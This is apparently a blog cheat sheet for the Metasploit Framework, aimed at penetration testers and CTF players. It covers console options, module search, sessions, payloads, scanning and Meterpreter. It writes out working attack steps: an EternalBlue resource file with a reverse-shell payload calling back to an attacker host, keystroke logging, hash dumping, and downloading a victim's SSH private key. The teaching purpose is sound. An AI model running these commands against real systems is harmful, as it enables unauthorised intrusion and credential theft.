Table of Contents
show
Introduction
Metasploit is one of the most powerful tools in an ethical hacker’s arsenal. Whether you’re performing a penetration test or competing in a Capture The Flag (CTF) event, Metasploit streamlines the process of identifying, exploiting, and gaining control of vulnerable systems.
This cheat sheet is designed as a quick-reference guide to help you master core Metasploit functionality—from starting up to post-exploitation.
🧰 Getting Started
MSF Database
Usage: msfdb [options] <command>
Manage a Metasploit Framework database
General Options:
--component COMPONENT Component used with provided command (default: database)
-d, --debug Enable debug output
-h, --help Show this help message
--use-defaults Accept all defaults and do not prompt for options
Database Options:
--msf-db-name NAME Database name (default: msf)
--msf-db-user-name USER Database username (default: msf)
--msf-test-db-name NAME Test database name (default: msftest)
--msf-test-db-user-name USER Test database username (default: msftest)
--db-port PORT Database port (default: 5433)
--db-pool MAX Database connection pool size (default: 200)
--connection-string URI Use a pre-existing database cluster for init
...
...
...
Commands:
init initialize the component
reinit delete and reinitialize the component
delete delete and stop the component
status check component status
start start the component
stop stop the component
restart restart the component
MSF Console
Usage: msfconsole [options]
Database options:
-n, --no-database Disable database support
Framework options:
-c FILE Load the specified configuration file
-v, -V, --version Show version
Module options:
-m, --module-path DIRECTORY Load an additional module path
Console options:
-a, --ask Ask before exiting Metasploit or accept 'exit -y'
-H, --history-file FILE Save command history to the specified file
-o, --output FILE Output to the specified file
-p, --plugin PLUGIN Load a plugin on startup
-q, --quiet Do not print the banner on startup
-r, --resource FILE Execute the specified resource file (- for stdin)
-x, --execute-command COMMAND Execute the specified console commands
-h, --help Show this message
📜 Automating with Resource Files
Automate sequences using .rc files:
msfconsole -r my_attack.rc -q
Sample my_attack.rc:
use exploit/windows/smb/ms17_010_eternalblue set RHOSTS 192.168.1.105 set PAYLOAD windows/x64/meterpreter/reverse_tcp set LHOST 192.168.1.100 exploit
🔎 Basic Commands
| Command | Description |
|---|---|
| search <keyword> | Search for modules |
| info | Get detailed info about the module |
| use <module> | Load a module |
| show options | Show module options |
| set <option> <value> | Set a value |
| run or exploit | Execute the module |
| back | Exit current module |
| exit | Exit Metasploit |
| help | List Metasploit commands |
💡 Tip: Use the tab key for auto-completion of commands and module names.
Workspace
Usage:
workspace List workspaces
workspace [name] Switch workspace
OPTIONS:
-a, --add <name> Add a workspace.
-d, --delete <name> Delete a workspace.
-D, --delete-all Delete all workspaces.
-h, --help Help banner.
-l, --list List workspaces.
-r, --rename <old> <new> Rename a workspace.
-S, --search <name> Search for a workspace.
-v, --list-verbose List workspaces verbosely.
Search Filter
Usage: search [<options>] [<keywords>:<value>]
Prepending a value with '-' will exclude any matching results.
If no options or keywords are provided, cached results are displayed.
OPTIONS:
-h, --help Help banner
-I, --ignore Ignore the command if the only match has the same name as the search
-o <filename> Send output to a file in csv format
-r <column> Reverse the order of search results to descending order
-S <filter> Regex pattern used to filter search results
-s <column> Sort search results by the specified column in ascending order
-u Use module if there is one result
Keywords:
action : Modules with a matching action name or description
arch : Modules affecting this architecture
att&ck : Modules with a matching MITRE ATT&CK ID or reference
author : Modules written by this author
bid : Modules with a matching Bugtraq ID
check : Modules that support the 'check' method
cve : Modules with a matching CVE ID
description : Modules with a matching description
edb : Modules with a matching Exploit-DB ID
fullname : Modules with a matching full name
mod_time : Modules with a matching modification date
name : Modules with a matching descriptive name
osvdb : Modules with a matching OSVDB ID
platform : Modules affecting this platform
-(windows,linux,unix,android,ios)
port : Modules with a matching port
rank : Modules with a matching rank
ref : Modules with a matching ref
reference : Modules with a matching reference
session_type : Modules with a matching session type
target : Modules affecting this target
type : Modules of a specific type
-(exploit, payload, auxiliary, encoder, evasion, post, or nop)
Supported search columns:
rank : Sort modules by their exploitability rank
date : Sort modules by their disclosure date. Alias for disclosure_date
disclosure_date : Sort modules by their disclosure date
name : Sort modules by their name
type : Sort modules by their type
check : Sort modules by whether or not they have a check method
action : Sort modules by whether or not they have actions
Examples:
search cve:2009 type:exploit
search cve:2009 type:exploit platform:-linux
search cve:2009 -s name
search type:exploit -s type -r
search att&ck:T1059
search ftp type:exploit platform:linux
Managing Sessions, Jobs
Usage: sessions [options] or sessions [id] Active session manipulation and interaction. OPTIONS: -c, --command <command> Run a command on the session given with -i, or all -d, --list-inactive List all inactive sessions -h, --help Help banner -i, --interact <id> Interact with the supplied session ID -k, --kill <id> Terminate sessions by session ID and/or range -K, --kill-all Terminate all sessions -l, --list List all active sessions -n, --name <id> <name> Name or rename a session by ID -q, --quiet Quiet mode -s, --script <script> Run a script or module on the session given with -i -t, --timeout <seconds> Set a response timeout (default: 15) -u, --upgrade <id> Upgrade a shell to a meterpreter session on many platforms -v, --list-verbose List all active sessions in verbose mode -x, --list-extended Show extended information in the session table background # Exit current session and remain background run -j or exploit -j # Run module or exploit in the background ----------------------------- Usage: jobs [options] Active job manipulation and interaction. OPTIONS: -h Help banner. -i Lists detailed information about a running job. -k Terminate jobs by job ID and/or range. -K Terminate all running jobs. -l List all running jobs. -p Add persistence to job by job ID -P Persist all running jobs on restart. -S Row search filter. -v Print more detailed info. Use with -i and -l
🎯 Payloads
Payloads define what happens after exploitation.
- Reverse Shell: Target connects back to the attacker
- Bind Shell: Attacker connects to the target’s listener
After you choose an exploit, you can run the following command to view the payloads that are available:
msf > use exploit/windows/smb/ms08_067_netapi msf exploit (ms08_067_netapi) > show payloads
Here’s the list, sorted by the order in which they will be selected:
windows/meterpreter/reverse_tcp java/meterpreter/reverse_tcp php/meterpreter/reverse_tcp php/meterpreter_reverse_tcp ruby/shell_reverse_tcp cmd/unix/interact cmd/unix/reverse cmd/unix/reverse_perl cmd/unix/reverse_netcat_gaping windows/meterpreter/reverse_nonx_tcp windows/meterpreter/reverse_ord_tcp windows/shell/reverse_tcp generic/shell_reverse_tcp
📡 Auxiliary & Scanning Modules
# Port Scanner: use auxiliary/scanner/portscan/tcp set RHOSTS 192.168.1.1/24 run # DNS Enumeration: use auxiliary/gather/dns_enum set DOMAIN <target_domain_name> run # FTP Server: use auxiliary/server/ftp set FTPROOT /tmp/ftproot run # Pivotting use auxiliary/server/socks4 run
🗃 Database Integration
Metasploit can store data like hosts and services:
# Useful commands: hosts services vulns loot # Use db_nmap for integrated scanning: db_nmap -sV 192.168.1.0/24
🧠Meterpreter Basics
Once you have a Meterpreter shell, try these:
| Command | Purpose |
|---|---|
| sysinfo | Show system info |
| getuid | Show user ID |
| shell | Drop into a command shell |
| download / upload | File transfer |
| screenshot | Capture desktop image |
| keyscan_start / keyscan_dump | Keystroke logging |
| hashdump | Dump password hashes |
| ps, migrate, background | Process migration & control |
Managing Channel
Usage: channel [options] Displays information about active channels. OPTIONS: -c Close the given channel. -h Help menu. -i Interact with the given channel. -k Close the given channel. -K Close all channels. -l List active channels. -r Read from the given channel. -w Write to the given channel.
Transferring Files – Upload
Syntax: upload /path/to/local/file [destination_path_on_target] # On Windows targets: meterpreter > upload /home/kali/Desktop/shell.exe C:\\Users\\Public\\ # You can confirm the upload worked by running: meterpreter > ls C:\\Users\\Public\\ # On Linux targets: meterpreter > upload /home/kali/Desktop/exploit.sh /tmp/ âš Note: Use double backslashes (\\) on Windows paths to avoid escape issues.
Transferring Files – Download
Syntax: download /path/to/remote/file [destination_path_on_local_directory] # On Windows Remote Machine: download C:\\Users\\target\\secret.txt /home/kali/Desktop/ # On Linux Remote Machine: download /home/victims/.ssh/id_rsa /home/kali/Desktop/ âš Note: Use double backslashes (\\) on Windows paths to avoid escape issues.
🎯 Final Thoughts & Takeaways
Metasploit isn’t just a framework—it’s a mindset. By mastering the core commands and modules, you can automate your testing, uncover vulnerabilities, and simulate real-world attacks safely. But remember: with great power comes great responsibility.
🛡 Always practice ethical hacking, get written permission, and use Metasploit in safe, legal environments like labs and CTFs.
🔗 Further Reading:
